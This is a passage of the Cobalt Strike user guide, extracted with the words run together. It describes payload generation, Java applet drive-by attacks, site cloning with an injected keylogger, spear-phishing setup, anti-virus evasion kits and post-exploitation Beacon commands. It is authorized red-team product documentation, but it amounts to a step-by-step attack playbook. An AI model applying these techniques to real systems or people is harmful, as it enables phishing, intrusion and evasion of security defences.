+Thread:Terminatesonlythecurrentthread.
+System Call-Selectoneofthefollowingsystemcallmethodstouseatexecutiontime
+whengeneratingastagelessbeaconpayloadfromtheCobaltStrikeUIora
+supportedaggressorfunction:
+None:UsethestandardWindowsAPIfunction.
+CobaltStrikeUserGuide www.fortra.com page:73
+
+InitialAccess/User-drivenAttackPackages
+Direct:UsetheNt*versionofthefunction.
+Indirect:JumptotheappropriateinstructionwithintheNt*versionofthe
+function.
+HTTP Library--SelecttheMicrosoftlibrary(WinINetorWinHTTP)forthegenerated
+payload.
+x64-Checktheboxtogenerateanx64stagerfortheselectedlistener.
+PressGeneratetocreateaPayloadfortheselectedoutputtype.
+Windows Executable
+ThispackagegeneratesaWindowsexecutableartifactthatdeliversapayloadstager.
+NavigatetoPayloads -> Windows Stager Payload.
+figure41-WindowExecutable
+Thispackageprovidesthefollowingoutputoptions:
+Parameters
+CobaltStrikeUserGuide www.fortra.com page:74
+
+InitialAccess/User-drivenAttackPackages
+Listener-Pressthe...buttontoselectaCobaltStrikelisteneryouwouldliketooutput
+apayloadfor.
+Output-Usethedrop-downtoselectoneofthefollowingoutputtypes.
+Windows EXE:AWindowsexecutable.
+Windows Service EXE:AWindowsexecutablethatrespondstoServiceControl
+Managercommands.YoumayusethisexecutabletocreateaWindows
+servicewithscorasacustomexecutablewiththeMetasploitFramework’s
+PsExecmodules.
+Windows DLL:AWindowsDLLthatexportsaStartWfunctionthatiscompatible
+withrundll32.exe.Userundll32.exetoloadyourDLLfromthecommandline.
+rundll32 foo.dll,StartW
+x64-Checktheboxtogeneratex64artifactsthatpairwithanx64stager.Bydefault,
+thisdialogexportsx64payloadstagers.
+sign-ChecktheboxtosignanEXEorDLLartifactwithacode-signingcertificate.You
+mustspecifyacertificateinaMalleableC2profile.
+PressGeneratetocreateapayloadstagerartifact.
+CobaltStrikeusesitsArtifactKittogeneratethisoutput.
+Windows Executable (Stageless)
+ThispackageexportsBeacon,withoutastager,asanexecutable,serviceexecutable,32-bitDLL,
+or64-bitDLL.Apayloadartifactthatdoesnotuseastageriscalledastagelessartifact.This
+packagealsohasaPowerShelloptiontoexportBeaconasaPowerShellscriptandarawoption
+toexportBeaconasablobofpositionindependentcode.
+NavigatetoPayloads -> Windows Stageless Payload.
+CobaltStrikeUserGuide www.fortra.com page:75
+
+InitialAccess/User-drivenAttackPackages
+figure42-WindowsStagelessExecutable
+Thispackageprovidesthefollowingoutputoptions:
+Parameters
+Listener-Pressthe...buttontoselectaCobaltStrikelisteneryouwouldliketooutput
+apayloadfor.
+Guardrails-Ifyourlistenerhasbeenconfiguredwithgauardrails,thevalueisdisplayed
+asthedefault.Usethe...buttontooverridethesettingsforthebeacon.
+CobaltStrikeUserGuide www.fortra.com page:76
+
+InitialAccess/User-drivenAttackPackages
+figure43-GuardrailSettings
+Output-Usethedrop-downtoselectoneofthefollowingoutputtypes.
+PowerShell:APowerShellscriptthatinjectsastagelessBeaconintomemory.
+Raw:AblobofpositionindependentcodethatcontainsBeacon.
+Windows EXE:AWindowsexecutable.
+Windows Service EXE:AWindowsexecutablethatrespondstoServiceControl
+Managercommands.YoumayusethisexecutabletocreateaWindows
+servicewithscorasacustomexecutablewiththeMetasploitFramework's
+PsExecmodules.
+Windows DLL:AWindowsDLLthatexportsaStartWfunctionthatiscompatible
+withrundll32.exe.Userundll32.exetoloadyourDLLfromthecommandline.
+rundll32 foo.dll,StartW
+Exit Function-Thisfunctiondeterminesthemethod/behaviorthatBeaconuseswhen
+theexitcommandisexecuted.
+Process:Terminatesthewholeprocess.
+Thread:Terminatesonlythecurrentthread.
+System Call-Selectoneofthefollowingsystemcallmethodstouseatexecutiontime
+whengeneratingastagelessbeaconpayloadfromtheCobaltStrikeUIora
+supportedaggressorfunction:
+None:UsethestandardWindowsAPIfunction.
+CobaltStrikeUserGuide www.fortra.com page:77
+
+InitialAccess/User-drivenAttackPackages
+Direct:UsetheNt*versionofthefunction.
+Indirect:JumptotheappropriateinstructionwithintheNt*versionofthe
+function.
+HTTP Library--SelecttheMicrosoftlibrary(WinINetorWinHTTP)forthegenerated
+payload.
+x64-Checktheboxtogenerateanx64artifactthatcontainsanx64payload.By
+default,thisdialogexportsx64payloads.
+sign-ChecktheboxtosignanEXEorDLLartifactwithacode-signingcertificate.You
+mustspecifyacertificateinaMalleableC2profile.
+PressGeneratetocreateastagelessartifact.
+CobaltStrikeusesitsArtifactKittogeneratethisoutput.
+Windows Executable (Stageless)Variants
+Thisoptiongeneratesallofthestagelesspayloads(inx86andx64)foralloftheconfigured
+listeners.
+NavigatetoPayloads -> Windows Stageless Generate All Payloads.
+figure44-WindowsStagelessExecutableVariants
+Parameters
+CobaltStrikeUserGuide www.fortra.com page:78
+
+InitialAccess/HostingFiles
+Folder-Pressthefolderbuttontoselectalocationtosavethelistener(s).
+System Call-Selectoneofthefollowingsystemcallmethodstouseatexecutiontime
+whengeneratingastagelessbeaconpayloadfromtheCobaltStrikeUIora
+supportedaggressorfunction:
+None:UsethestandardWindowsAPIfunction.
+Direct:UsetheNt*versionofthefunction.
+Indirect:JumptotheappropriateinstructionwithintheNt*versionofthe
+function.
+HTTP Library--SelecttheMicrosoftlibrary(WinINetorWinHTTP)forthegenerated
+payload.
+Sign-ChecktheboxtosignanEXEorDLLartifactwithacode-signingcertificate.You
+mustspecifyacertificateinaMalleableC2profile.
+PressGeneratetocreateastagelessartifact.
+Hosting Files
+CobaltStrike’swebservercanhostyouruser-drivenpackagesforyou.Fromthemenu,select
+Site Management -> Host Fileandperformthefollowingtosetup:
+1. Choosethefiletohost
+2. SelectanarbitraryURL
+3. Choosethemimetypeforthefile.
+Byitself,thecapabilitytohostafileisn’tveryimpressive.However,insectionsthatfollow,you
+willlearnhowtoembedCobaltStrikeURLsintoaspearphishingemail.Whenyoudothis,
+CobaltStrikecancross-referencevisitorstoyourfilewithsentemailsandincludethis
+informationinthesocialengineeringreport.
+CheckEnable SSLtoservethiscontentoverSSL.Thisoptionisavailablewhenyouspecifya
+validSSLcertificateinyourMalleableC2profile.
+User-driven Web Drive-by Attacks
+CobaltStrikeUserGuide www.fortra.com page:79
+
+InitialAccess/User-drivenWebDrive-byAttacks
+CobaltStrikemakesseveraltoolstosetupwebdrive-byattacksavailabletoyou.Toquicklystart
+anattack,navigatetoAttacksandchooseoneofthefollowingoption:
+Java Signed Applet Attack
+Thisattackstartsawebserverhostingaself-signedJavaapplet.Visitorsareaskedtogivethe
+appletpermissiontorun.Whenavisitorgrantsthispermission,yougainaccesstotheirsystem.
+TheJavaSignedAppletAttackusesCobaltStrike’sJavainjector.OnWindows,theJavainjector
+willinjectshellcodeforaWindowslistenerdirectlyintomemoryforyou.
+NavigatetoAttacks -> Signed Applet Attack.
+figure45-SignedAppletAttack
+Parameters
+Local URL/Host/Path-SettheLocalURLPath,HostandPorttoconfigurethe
+webserver.
+Listener-Pressthe...buttontoselectaCobaltStrikelisteneryouwouldliketooutput
+apayloadfor.
+SSL-ChecktoservethiscontentoverSSL.Thisoptionisavailablewhenyouspecifya
+validSSLcertificateinyourMalleableC2profile.
+PressLaunchtostarttheattack.
+CobaltStrikeUserGuide www.fortra.com page:80
+
+InitialAccess/User-drivenWebDrive-byAttacks
+Java Smart Applet Attack
+CobaltStrike’sSmartAppletAttackcombinesseveralexploitstodisabletheJavasecurity
+sandboxintoonepackage.ThisattackstartsawebserverhostingaJavaapplet.Initially,this
+appletrunsinJava’ssecuritysandboxanditdoesnotrequireuserapprovaltostart.
+TheappletanalyzesitsenvironmentanddecideswhichJavaexploittouse.IftheJavaversion
+isvulnerable,theappletwilldisablethesecuritysandbox,andexecuteapayloadusingCobalt
+Strike’sJavainjector.
+NavigatetoAttacks -> Smart Applet Attack.
+figure46-SmartAppletAttack
+Parameters
+Local URL/Host/Path-SettheLocalURLPath,HostandPorttoconfigurethe
+webserver.
+Listener-Pressthe...buttontoselectaCobaltStrikelisteneryouwouldliketooutput
+apayloadfor.
+SSL-ChecktoservethiscontentoverSSL.Thisoptionisavailablewhenyouspecifya
+validSSLcertificateinyourMalleableC2profile.
+PressLaunchtostarttheattack.
+Scripted Web Delivery (S)
+CobaltStrikeUserGuide www.fortra.com page:81
+
+InitialAccess/User-drivenWebDrive-byAttacks
+ThisfeaturegeneratesastagelessBeaconpayloadartifact,hostsitonCobaltStrike’sweb
+server,andpresentsaone-linertodownloadandruntheartifact.
+NavigatetoAttacks -> Scripted Web Delivery (S)fromthemenu.
+figure47-ScrptedWebDelivery(S)
+Parameters
+Local URL/Host/Path-SettheLocalURLPath,HostandPorttoconfigurethe
+webserver.MakesuretheHostfieldmatchestheCNfieldofyourSSLcertificate.
+Thiswillavoidasituationwherethisfeaturefailsbecauseofamismatch
+betweenthesefields.
+Listener-Pressthe...buttontoselectaCobaltStrikelisteneryouwouldliketooutput
+apayloadfor.
+Type-Usethedrop-downmenutoselectoneofthefollowingtypes:
+bitsadmin :Thisoptionhostsanexecutableandusesbitsadmintodownloadit.
+Thebitsadminmethodrunstheexecutableviacmd.exe.
+exe :ThisoptiongeneratesanexecutableandhostsitonCobaltStrike’sweb
+server.
+CobaltStrikeUserGuide www.fortra.com page:82
+
+InitialAccess/Client-sideExploits
+powershell ThisoptionhostsaPowerShellscriptandusespowershell.exeto
+downloadthescriptandevaluateit.
+powershell IEX :ThisoptionhostsaPowerShellscriptandusespowershell.exe
+todownloadthescriptandevaluateit.Similartopriorpowershell option,but
+itprovidesashorterInvoke-Executionone-linercommand.
+python : ThisoptionhostsaPythonscriptandusespython.exetodownloadthe
+scriptandrunit.EachoftheseoptionsisadifferentwaytorunaCobaltStrike
+listener.
+x64-Checktheboxtogenerateanx64stagerfortheselectedlistener.
+SSL-ChecktoservethiscontentoverSSL.Thisoptionisavailablewhenyouspecifya
+validSSLcertificateinyourMalleableC2profile.
+PressLaunchtostarttheattack.
+Client-side Exploits
+YoumayuseaMetasploitFrameworkexploittodeliveraCobaltStrikeBeacon.CobaltStrike’s
+BeaconiscompatiblewiththeMetasploitFramework’sstagingprotocol.TodeliveraBeacon
+withaMetasploitFrameworkexploit:
+l Usewindows/meterpreter/reverse_http[s]asyourPAYLOADandsetLHOSTandLPORT
+topointtoyourCobaltStrikelistener.You’renotreallydeliveringMeterpreterhere,you’re
+tellingtheMetasploitFrameworktogeneratetheHTTP[s]stagerthatdownloadsa
+payloadfrom thespecifiedLHOST/LPORT.
+l SetDisablePayloadHandlertoTrue.ThiswilltelltheMetasploitFrameworktoavoid
+standingupahandlerwithintheMetasploitFrameworktoserviceyourpayload
+connection.
+l SetPrependMigratetoTrue.ThisoptiontellstheMetasploitFrameworktoprepend
+shellcodethatrunsthepayloadstagerinanotherprocess.ThishelpsyourBeacon
+sessionsurvivesiftheexploitedapplicationcrashesorifit’sclosedbyauser.
+Here’sascreenshotofmsfconsoleusedtostandupaFlashExploittodeliverCobaltStrike’s
+HTTPBeaconhostedat192.168.1.5onport80:
+CobaltStrikeUserGuide www.fortra.com page:83
+
+InitialAccess/CloneaSite
+figure48-UsingClient-sideAttacksfromMetasploit
+Clone a Site
+Beforesendinganexploittoatarget,ithelpstodressitup.CobaltStrike’swebsiteclonetoolcan
+helpwiththis.Thewebsiteclonetoolmakesalocalcopyofawebsitewithsomecodeaddedto
+fixlinksandimagessotheyworkasexpected.
+Tocloneawebsite,gotoSite Management -> Clone Site.
+figure49-WebsiteCloneTool
+CobaltStrikeUserGuide www.fortra.com page:84
+
+InitialAccess/SpearPhishing
+It’spossibletoembedanattackintoaclonedsite.WritetheURLofyourattackintheEmbed
+fieldandCobaltStrikewilladdittotheclonedsitewithanIFRAME.Clickthe... buttontoselect
+oneoftherunningclient-sideexploits.
+Clonedwebsitescanalsocapturekeystrokes.ChecktheLog keystrokes on cloned sitebox.
+ThiswillinsertaJavaScriptkeyloggerintotheclonedsite.
+Toviewloggedkeystrokesorseevisitorstoyourclonedsite,gotoView -> Web Log.
+CheckEnable SSLtoservethiscontentoverSSL.Thisoptionisavailablewhenyouspecifya
+validSSLcertificateinyourMalleableC2profile.MakesuretheHostfieldmatchestheCNfield
+ofyourSSLcertificate.Thiswillavoidasituationwherethisfeaturefailsbecauseofamismatch
+betweenthesefields.
+Spear Phishing
+Nowthatyouhaveanunderstandingofclient-sideattacks,let’stalkabouthowtogettheattack
+totheuser.Themostcommonwayintoanorganization’snetworkisthroughspearphishing.
+CobaltStrike'sspearphishingtoolallowsyoutosendpixelperfectspearphishingmessages
+usinganarbitrarymessageasatemplate.
+Targets
+Beforeyousendaphishingmessage,youshouldassemblealistoftargets.CobaltStrike
+expectstargetsinatextfile.Eachlineofthefilecontainsonetarget.Thetargetmaybeanemail
+address.Youmayalsouseanemailaddress,atab,andaname.Ifprovided,anamehelps
+CobaltStrikecustomizeeachphish.
+Templates
+Next,youneedaphishingtemplate.Thenicethingabouttemplatesisthatyoumayreusethem
+betweenengagements.CobaltStrikeusessavedemailmessagesasitstemplates.Cobalt
+Strikewillstripattachments,dealwithencodingissues,andrewriteeachtemplateforeach
+phishingattack.
+Ifyou’dliketocreateacustomtemplate,composeamessageandsendittoyourself.Most
+emailclientshaveawaytogettheoriginalmessagesource.InGmail,clickthedownarrownext
+toReply andselectShow original.Savethismessagetoafileandthencongratulateyourself—
+you’vemadeyourfirstCobaltStrikephishingtemplate.
+YoumaywanttocustomizeyourtemplatewithCobaltStrike’stokens.CobaltStrikereplaces
+thefollowingtokensinyourtemplates:
+CobaltStrikeUserGuide www.fortra.com page:85
+
+InitialAccess/SpearPhishing
+Token Description
+%To% Theemailaddressofthepersonthemessageissentto
+%To_Name% Thenameofthepersonthemessageissentto.
+%URL% ThecontentsoftheEmbedURLfieldinthespearphishingdialog.
+Sending Messages
+Nowthatyouhaveyourtargetsandatemplate,you’rereadytogophishing.Tostartthespear
+phishingtool,gotoAttacks ->Spear Phish.
+figure50-SpearPhishingTool
+Tosendaphishingmessage,youmustfirstimportyourlistofTargets.Youmayimportaflat
+text-filecontainingoneemailaddressperline.Importafilecontainingoneemailaddressand
+nameseparatedbyataborcommaforstrongermessagecustomization.Clickthefoldernext
+totheTargetsfieldtoimportyourtargetsfile.
+SetTemplatetoanemailmessagetemplate.ACobaltStrikemessagetemplateissimplya
+savedemailmessage.CobaltStrikewillstripunnecessaryheaders,removeattachments,
+rewriteURLs,re-encodethemessage,andrewriteitforyou.Clickonthefoldernexttothe
+Templatefieldtochooseone.
+CobaltStrikeUserGuide www.fortra.com page:86
+
+InitialAccess/SpearPhishing
+YouhavetheoptiontoaddanAttachment.Thisisagreattimetouseoneofthesocial
+engineeringpackagesdiscussedearlier.CobaltStrikewilladdyourattachmenttotheoutgoing
+phishingmessage.
+CobaltStrikedoesnotgiveyouameanstocomposeamessage.Useanemailclient,writea
+message,andsendittoyourself.Mostwebmailclientsincludeameanstoseetheoriginal
+messagesource.InGMail,clickthedownarrownexttoReplyandselectShoworiginal.
+YoumayalsoaskCobaltStriketorewriteallURLsinthetemplatewithaURLofyourchoosing.
+SetEmbed URLtohaveCobaltStrikerewriteeachURLinthemessagetemplatetopointtothe
+embeddedURL.URLsaddedinthiswaywillcontainatokenthatallowsCobaltStriketotrace
+anyvisitorbacktothisparticularspearphishingattack.CobaltStrike'sreportingandweblog
+featurestakeadvantageofthistoken.Press...tochooseoneoftheCobaltStrikehostedsites
+you'vestarted.
+WhenyouembedaURL,CobaltStrikewillattach?id=%TOKEN%toit.Eachsentmessagewill
+getitsowntoken.CobaltStrikeusesthistokentomapwebsitevisitorstosentemails.Ifyou
+careaboutreporting,besuretokeepthisvalueinplace.
+SetMail Servertoanopenrelayorthemailexchangerecordforyourtarget.Ifnecessary,you
+mayalsoauthenticatetoamailservertosendyourphishingmessages.
+Press… nexttotheMailServerfieldtoconfigureadditionalserveroptions.Youmayspecifya
+usernameandpasswordtoauthenticatewith.TheRandomDelayoptiontellsCobaltStriketo
+randomlydelayeachmessagebyarandomtime,uptothenumberofsecondsyouspecify.If
+thisoptionisnotset,CobaltStrikewillnotdelayitsmessages.
+figure51-ConfigureMailServer
+SetBounce Totoanemailaddresswherebouncedmessagesshouldgo.Thisvaluewillnot
+affectthemessageyourtargetssee.PressPreview toseeanassembledmessagetooneof
+yourrecipients.Ifthepreviewlooksgood,pressSend todeliveryourattack.
+CobaltStrikeUserGuide www.fortra.com page:87
+
+InitialAccess/SpearPhishing
+CobaltStrikesendsphishingmessagesthroughtheteamserver.
+CobaltStrikeUserGuide www.fortra.com page:88
+
+PayloadArtifactsandAnti-virusEvasion/TheArtifactKit
+Payload Artifacts and Anti-virus
+Evasion
+Fortraregularlyfieldsquestionsaboutevasion.DoesCobaltStrikebypassanti-virusproducts?
+Whichanti-virusproductsdoesitbypass?Howoftenisthischecked?
+TheCobaltStrikedefaultartifactswilllikelybesnaggedbymostendpointsecuritysolutions.
+AlthoughevasionisnotagoalofthedefaultCobaltStrikeproduct,CobaltStrikedoesoffer
+someflexibility.
+You,theoperator,maychangetheexecutables,DLLs,applets,andscripttemplatesCobalt
+Strikeusesinitsworkflows.YoumayalsoexportCobaltStrike’sBeaconpayloadinavarietyof
+formatsthatworkwiththird-partytoolsdesignedtoassistwithevasion.
+ThischapterhighlightstheCobaltStrikefeaturesthatprovidethisflexibility.
+The Artifact Kit
+CobaltStrikeusestheArtifactKittogenerateitsexecutablesandDLLs.TheArtifactKitispartof
+theArsenalKit,whichcontainsacollectionofkits—asourcecodeframeworktobuild
+executablesandDLLsthatevadesomeanti-virusproducts.
+The Theory of the Artifact Kit
+Traditionalanti-virusproductsusesignaturestoidentifyknownbad.Ifweembedourknown
+badshellcodeintoanexecutable,ananti-virusproductwillrecognizetheshellcodeandflagthe
+executableasmalicious.
+Todefeatthisdetection,it’scommonforanattackertoobfuscatetheshellcodeinsomeway
+andplaceitinthebinary.Thisobfuscationprocessdefeatsanti-virusproductsthatuseasimple
+stringsearchtoidentifymaliciouscode.
+Manyanti-virusproductsgoastepfurther.Theseanti-virusproductssimulateexecutionofan
+executableinavirtualsandbox.Witheachemulatedstepofexecution,theanti-virusproduct
+checksforknownbadintheemulatedprocessspace.Ifknownbadshowsup,theanti-virus
+productflagstheexecutableorDLLasmalicious.Thistechniquedefeatsmanyencodersand
+packersthattrytohideknownbadfromsignature-basedanti-virusproducts.
+CobaltStrike’scountertothisissimple.Theanti-virussandboxhaslimitations.Itisnota
+completevirtualmachine.Therearesystembehaviorstheanti-virussandboxdoesnotemulate.
+CobaltStrikeUserGuide www.fortra.com page:89
+
+PayloadArtifactsandAnti-virusEvasion/TheArtifactKit
+TheArtifactKitisacollectionofexecutableandDLLtemplatesthatrelyonsomebehaviorthat
+anti-virusproduct’sdonotemulatetorecovershellcodelocatedinsideofthebinary.
+Oneofthetechniques[see:src-common/bypass-pipe.cintheArtifactKit]generates
+executablesandDLLsthatserveshellcodetothemselvesoveranamedpipe.Ifananti-virus
+sandboxdoesnotemulatenamedpipes,itwillnotfindtheknownbadshellcode.
+Where Artifact Kit Fails
+Ofcourseit’spossibleforanti-virusproductstodefeatspecificimplementationsoftheArtifact
+Kit.Ifananti-virusvendorwritessignaturesfortheArtifactKittechniqueyouuse,thenthe
+executablesandDLLsitcreateswillgetcaught.Thisstartedtohappen,overtime,withthe
+defaultbypasstechniqueinCobaltStrike2.5andbelow.Ifyouwanttogetthemostfromthe
+ArtifactKit,youwilluseoneofitstechniquesasabasetobuildyourownArtifactKit
+implementation.
+Eventhatisn’tenoughthough.Someanti-virusproductscallhometotheanti-virusvendor’s
+servers.TherethevendormakesadeterminationiftheexecutableorDLLisknowngoodoran
+unknown,neverbeforeseen,executableorDLL.Someoftheseproductsautomaticallysend
+unknownexecutablesandDLLstothevendorforfurtheranalysisandwarntheusers.Others
+treatunknownexecutablesandDLLsasmalicious.Itdependsontheproductanditssettings.
+Thepoint:noamountof“obfuscation”isgoingtohelpyouinthissituation.You’reupagainsta
+differentkindofdefenseandwillneedtoworkarounditaccordingly.Treatthesesituationsthe
+samewayyouwouldtreatapplicationwhitelisting.Trytofindaknowngoodprogram(e.g.,
+powershell)thatwillgetyourpayloadstagerintomemory.
+How to use the Artifact Kit
+GotoHelp ->Arsenal fromalicensedCobaltStriketodownloadtheArsenalKit.Youcanalso
+accesstheArsenaldirectlyat:https://www.cobaltstrike.com/scripts
+FortradistributestheArsenalKitasa.tgzfile.Usethetarcommandtoextractit.TheArsenalKit
+includestheArtifactkit,whichcanbebuiltwithotherkitsorasastandalonekit.SeetheArsenal
+KitREADME.mdfileforinformationonbuildingthekits.
+You’reencouragedtomodifytheArtifactKitanditstechniquestomakeitmeetyourneeds.
+WhileskilledCprogrammerscandomorewiththeArtifactKit,it’squitefeasibleforan
+adventurousnon-programmertoworkwiththeArtifactKittoo.Forexample,amajoranti-virus
+productlikestowritesignaturesfortheexecutablesinCobaltStrike’strialeachtimethereisa
+release.UpuntilCobaltStrike2.5,thetrialandlicensedversionsofCobaltStrikeusedthenamed
+pipetechniqueinitsexecutablesandDLLs.Thisvendorwouldwriteasignatureforthenamed
+CobaltStrikeUserGuide www.fortra.com page:90
+
+PayloadArtifactsandAnti-virusEvasion/TheVeilEvasionFramework
+pipestringtheexecutableused.Defeatingtheirsignatures,releaseafterrelease,wasassimple
+aschangingthenameofthepipeinthepipetechnique’ssourcecode.
+The Veil Evasion Framework
+Veilisapopularframeworktogenerateexecutablesthatgetpastsomeanti-virusproducts.You
+mayuseVeiltogenerateexecutablesforCobaltStrike’spayloads.
+Steps
+1. GotoPayloads -> Stager Payload Generator.
+2. Choosethelisteneryouwanttogenerateanexecutablefor.
+3. SelectVeilastheOutputtype.
+4. PressGenerateandsavethefile.
+5. LaunchtheVeil Evasion Frameworkandchoosethetechniqueyouwanttouse.
+6. Veilwilleventuallyaskaboutshellcode.SelectVeil’soptiontosupplycustom shellcode.
+7. PasteinthecontentsofthefileCobaltStrike’spayloadgeneratormade.
+8. PressenterandyouwillhaveafreshVeil-madeexecutable.
+figure 52 - UsingVeiltoGenerateanExecutable
+Java Applet Attacks
+FortradistributesthesourcecodetoCobaltStrike’sAppletAttacksastheAppletKit.Thisisalso
+availablewithintheCobaltStrikearsenal.GotoHelp ->Arsenal anddownloadtheAppletKit.
+Usetheincludedbuild.shscripttobuildtheAppletKitonKaliLinux.ManyCobaltStrike
+customersusethisflexibilitytosignCobaltStrike’sJavaAppletattackswithacode-signing
+certificatethattheypurchased.Thisishighlyrecommended.
+CobaltStrikeUserGuide www.fortra.com page:91
+
+PayloadArtifactsandAnti-virusEvasion/TheResourceKit
+TomakeCobaltStrikeuseyourAppletKitoverthebuilt-inone,loadtheapplet.cnascript
+includedwiththeAppletKit.
+OntheCobaltStrikeArsenalPageyouwillalsonoticethePower Applet.Thisisanalternate
+implementationofCobaltStrike’sJavaAppletattacksthatusesPowerShelltogetapayload
+intomemory.ThePowerAppletdemonstratestheflexibilityyouhavetorecreateCobaltStrike’s
+standardattacksinacompletelydifferentwayandstillusethemwithCobaltStrike’sworkflows.
+TomakeCobaltStrikeuseyourAppletKitoverthebuilt-inone,loadtheapplet.cnascript
+includedwiththeAppletKit.
+The Resource Kit
+TheResourceKitisCobaltStrike’smeanstochangetheHTA,PowerShell,Python,VBA,andVBS
+scripttemplatesCobaltStrikeusesinitsworkflows.TheResourceKitispartoftheArsenalKit,
+whichcontainsacollectionofkitsandisavailabletolicensedusersintheCobaltStrikearsenal.
+GotoHelp ->Arsenal todownloadtheArsenalKit.
+TheREADME.mdsuppliedwiththeResourceKitdocumentstheincludedscriptsandwhich
+featuresusethem.Toevadeaproduct,considerchangingstringsorbehaviorsinthesescripts.
+TomakeCobaltStrikeuseyourscripttemplatesoverthebuilt-inscripttemplates,loadeither
+thedist/arsenal_kit.cnaordist/resource/resources.cnascript.SeetheArsenalKitREADME.md
+fileformoreinformation.
+The Sleep Mask Kit
+TheSleepMaskKitisthesourcecodeforthesleepmaskfunctionthatisexecutedtoobfuscate
+Beacon,inmemory,priortosleeping.Thisobfuscationtechniquemaybeusedtoidentify
+Beacon.Todefeatthisdetection,CobaltStrikeprovidsanaggressorscriptthatallowstheuser
+tomodifyhowthesleepmaskfunctionlooksinmemory.Withthe4.5releasealistofheap
+recordstomaskandunmaskisincluded.GotoHelp -> ArsenaltodownloadtheArsenalKit
+whichincludestheSleepMaskKit.Yourlicensekeyisrequired.
+FormoreinformationontheSleepMaskKitseethearsenal-kit/README.mdandarsenal-
+kit/kits/sleepmask/README.mdfiles.
+CobaltStrikeUserGuide www.fortra.com page:92
+
+PostExploitation/BeaconCovertC2Payload
+Post Exploitation
+Beacon Covert C2 Payload
+BeaconisCobaltStrikespayloadtomodeladvancedattackers.UseBeacontoegressanetwork
+overHTTP,HTTPS,orDNS.Youmayalsolimitwhichhostsegressanetworkbycontrolling
+peer-to-peerBeaconsoverWindowsnamedpipes.
+Beaconisflexibleandsupportsasynchronousandinteractivecommunication.Asynchronous
+communicationislowandslow.Beaconwillphonehome,downloaditstasks,andgotosleep.
+Interactivecommunicationhappensinreal-time.
+Beacon'snetworkindicatorsaremalleable.RedefineBeacon'scommunicationwithCobalt
+Strike'smalleableC2language.ThisallowsyoutocloakBeaconactivitytolooklikeother
+malwareorblend-inaslegitimatetraffic.
+The Beacon Console
+Right-clickonaBeaconsessionandselectinteracttoopenthatBeacon’sconsole.Theconsole
+isthemainuserinterfaceforyourBeaconsession.TheBeaconconsoleallowsyoutoseewhich
+taskswereissuedtoaBeaconandtoseewhenitdownloadsthem.TheBeaconconsoleisalso
+wherecommandoutputandotherinformationwillappear.
+figure53-CobaltStrikeBeaconConsole
+InbetweentheBeaconconsole’sinputandoutputisastatusbar.Thisstatusbarcontains
+informationaboutthecurrentsession.Initsdefaultconfiguration,thestatusbarshowsthe
+target’sNetBIOSname,theusernameandPIDofthecurrentsession,andtheBeacon’slast
+check-intime.
+CobaltStrikeUserGuide www.fortra.com page:93
+
+PostExploitation/TheBeaconMenu
+Eachcommandthat’sissuedtoaBeacon,whetherthroughtheGUIortheconsole,willshowup
+inthiswindow.Ifateammateissuesacommand,CobaltStrikewillpre-fixthecommandwith
+theirhandle.
+YouwilllikelyspendmostofyourtimewithCobaltStrikeintheBeaconconsole.It’sworthyour
+timetobecomefamiliarwithitscommands.Typehelp intheBeaconconsoletoseeavailable
+commands.Typehelp followedbyacommandnametogetdetailedhelp.
+The Beacon Menu
+Right-clickonaBeaconorinsideofaBeacon’sconsoletoaccesstheBeaconmenu.Thisisthe
+samemenuusedtoopentheBeaconconsole.Thefollowingitemsareavailable:
+TheAccessmenucontainsoptionstomanipulatetrustmaterialandelevateyouraccess.
+TheExploremenuconsistsofoptionstoextractinformationandinteractwiththetarget’s
+system.
+ThePivotingmenuiswhereyoucansetuptoolstotunneltrafficthroughaBeacon.
+TheSessionmenuiswhereyoumanagethecurrentBeaconsession.
+figure54-CobaltStrikeBeaconMenu
+SomeofCobaltStrike’svisualizations(thepivotgraphandsessionstable)letyouselectmultiple
+Beaconsatonetime.Mostactionsthathappenthroughthismenuwillapplytoallselected
+Beaconsessions.
+Asynchronous and Interactive Operations
+CobaltStrikeUserGuide www.fortra.com page:94
+
+PostExploitation/RunningCommands
+BeawarethatBeaconisanasynchronouspayload.Commandsdonotexecuterightaway.Each
+commandgoesintoaqueue.WhentheBeaconchecksin(connectstoyou),itwilldownload
+thesecommandsandexecutethemonebyone.Atthistime,Beaconwillalsoreportanyoutput
+ithasforyou.Ifyoumakeamistake,usetheclear commandtoclearthecommandqueuefor
+thecurrentBeacon.
+Bydefault,Beaconscheckineverysixtyseconds.YoumaychangethiswithBeacon’ssleep
+command.UsesleepfollowedbyatimeinsecondstospecifyhowoftenBeaconshouldcheck
+in.Youmayalsospecifyasecondnumberbetween0and99.Thisnumberisajitterfactor.
+Beaconwillvaryeachofitscheckintimesbytherandompercentageyouspecifyasajitter
+factor.Forexample,sleep 300 20,willforceBeacontosleepfor300secondswitha20%jitter
+percentage.Thismeans,Beaconwillsleepforarandomvaluebetween240sto300saftereach
+check-in.
+TomakeaBeaconcheckinmultipletimeseachsecond,trysleep 0.Thisisinteractivemode.In
+thismodecommandswillexecuterightaway.YoumustmakeyourBeaconinteractivebefore
+youtunneltrafficthroughit.AfewBeaconcommands(e.g.,browserpivot,desktop,etc.)will
+automaticallyputBeaconintointeractivemodeatthenextcheckin.
+Running Commands
+Beacon’sshell commandwilltaskaBeacontoexecuteacommandviacmd.exeonthe
+compromisedhost.Whenthecommandcompletes,Beaconwillpresenttheoutputtoyou.
+Usetherun commandtoexecuteacommandwithoutcmd.exe.Theruncommandwillpost
+outputtoyou.Theexecute commandrunsaprograminthebackgroundanddoesnotcapture
+output.
+Usethepowershell commandtoexecuteacommandwithPowerShellonthecompromised
+host.Usethepowerpick commandtoexecutePowerShellcmdletswithoutpowershell.exe.
+ThiscommandreliesontheUnmanagedPowerShelltechniquedevelopedbyLeeChristensen.
+Thepowershellandpowerpickcommandswilluseyourcurrenttoken.
+Thepsinject commandwillinjectUnmanagedPowerShellintoaspecificprocessandrunyour
+cmdletfromthatlocation.
+Thepowershell-import commandwillimportaPowerShellscriptintoBeacon.Futureusesof
+thepowershell,powerpick,andpsinjectcommandswillhavecmdletsfromtheimportedscript
+availabletothem.BeaconwillonlyholdonePowerShellscriptatatime.Importanemptyfileto
+cleartheimportedscriptfromBeacon.
+Theexecute-assembly commandwillrunalocal.NETexecutableasaBeaconpost-
+exploitationjob.YoumaypassargumentstothisassemblyasifitwererunfromaWindows
+command-lineinterface.Thiscommandwillalsoinherityourcurrenttoken.
+CobaltStrikeUserGuide www.fortra.com page:95
+
+PostExploitation/SessionPassing
+IfyouwantBeacontoexecutecommandsfromaspecificdirectory,usethecd commandinthe
